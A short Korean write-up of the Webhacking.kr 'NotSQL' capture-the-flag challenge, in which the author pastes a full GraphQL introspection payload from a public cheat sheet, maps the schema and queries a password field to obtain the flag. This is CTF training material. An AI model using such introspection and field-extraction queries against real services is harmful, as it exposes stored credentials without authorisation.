[Webhacking.kr] NotSQL write-up

문제에 접속한 뒤 네트워크 탭을 열고

링크들을 들어가보면

view.php 라는 친구가 무언가 처리를 해주고 있음을 알 수 있습니다.

 

view.php로 가서 에러를 일으켜보면

GraphQL이라는 친구를 db로 사용하고 있음을 알 수 있습니다.

깃허브 치팅시트를 찾아보면 아래와 같은 코드가 있습니다.

__schema{queryType{name},mutationType{name},types{kind,name,description,fields(includeDeprecated:true){name,description,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},isDeprecated,deprecationReason},inputFields{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue},interfaces{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason,},possibleTypes{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}},directives{name,description,locations,args{name,description,type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}},defaultValue}}}

 

쿼리에 먹이면 전체 조회된 값이 출력됩니다.

해당 코드를 JSON Viewer로 가져가서 보면

문제 사용되던 view가 있습니다.

또한 login_~ 라는 친구도 보입니다.

이 친구의 필드는 아래 사진을 보면 userid_~, passwd_~ 총 2개 임을 알 수 있습니다

 

 

이 중 passwd 필드를 조회해보면

플래그가 나옵니다!

---

레퍼런스

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md#exploit

GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF